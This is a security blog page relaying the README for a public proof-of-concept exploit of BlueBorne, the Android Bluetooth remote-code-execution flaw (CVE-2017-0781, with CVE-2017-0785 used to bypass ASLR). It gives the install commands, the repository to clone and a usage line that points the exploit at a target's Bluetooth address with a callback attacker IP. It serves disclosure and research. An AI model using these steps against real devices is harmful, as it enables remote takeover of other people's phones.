Skip to content

Penetration Testing

Search for:

Home
Cyber Security
Data Leak
Forensics
Malware Analysis
Malware Attack
Network PenTest
Reverse Engineering
Vulnerability
Web PenTest

Home
Cyber Security
Data Leak
Forensics
Malware Analysis
Malware Attack
Network PenTest
Reverse Engineering
Vulnerability
Web PenTest

Search for:

Penetration Testing

Smartphone PenTest

blueborne: BlueBorne Android Exploit PoC

by do son · October 27, 2017

BlueBorne Android Exploit PoC

This repository contains a PoC code of BlueBorne’s Android RCE vulnerability (CVE-2017-0781). It also uses the SDP Information leak vulnerability (CVE-2017-0785) to bypass ASLR. It achieves code execution on a Google Pixel Android smartphone running version 7.1.2 with Security Patch Level July or August 2017. This code can also be altered a bit in order to target other Android smartphones.

All code can be found under android dir.

For more details you may read the full technical white paper available here:

https://www.armis.com/blueborne/

In addition, a detailed blog post on the exploitation of this vulnerability is available here: https://www.armis.com/blueborne-on-android-exploiting-rce-over-the-air/

Install

sudo apt-get install libbluetooth-dev
sudo pip2 install pybluez pwn
git clone https://github.com/ArmisSecurity/blueborne.git

Usage

sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>

IP needs to be accessible from the victim (should be the IP of the machine that runs the exploit)

Demo

Source: https://github.com/ArmisSecurity/blueborne

Share

Tags: BlueBorne

Next story Metasploit Plugins: Add some useful plugin to Metasploit Framework
Previous story BTA: open-source Active Directory security audit framework

Follow:

Search

Secure Your Connection

Popular Posts
Tags

Malware

New Android Banker “SoumniBot” Employs Clever Tricks to Evade Detection

April 17, 2024
Malware

Stealthy New Loader Helps SPARKRAT Malware Evade Detection

March 17, 2024
Malware

Urgent Alert: “Free Wedding Invite” Scam Targets Senior Citizens, Steals Sensitive Data

March 17, 2024
Vulnerability

CVE-2024-23138 & 23139: Autodesk Patches Critical Flaws in Popular Design Software

March 17, 2024
Data Leak / Malware

Fujitsu Discloses Data Breach, Customer and Personal Information Compromised

March 17, 2024

active directory android Apple backdoor BurpSuite chrome CISA cisco cyberattack Data Breach facebook gitlab google google chrome hacker kali linux Linux Linux Kernel malware metasploit Microsoft nmap OSINT penetration testing Pentesting PoC powershell privilege escalation Python ransomware shodan sqli sql injection sqlmap ssh Ubuntu vmware Vulnerability web app webapp pentest webshell windows wireless wordpress XSS

Adaptive password tools

Reward

Brilliantly

SAFE!

securityonline.info

Content & Links

Verified by Sur.ly

2022

Website

About SecurityOnline.info
Advertise on SecurityOnline.info
Contact

About Us
Contact Us
Disclaimer
Privacy Policy
DMCA NOTICE

Penetration Testing © 2024. All Rights Reserved.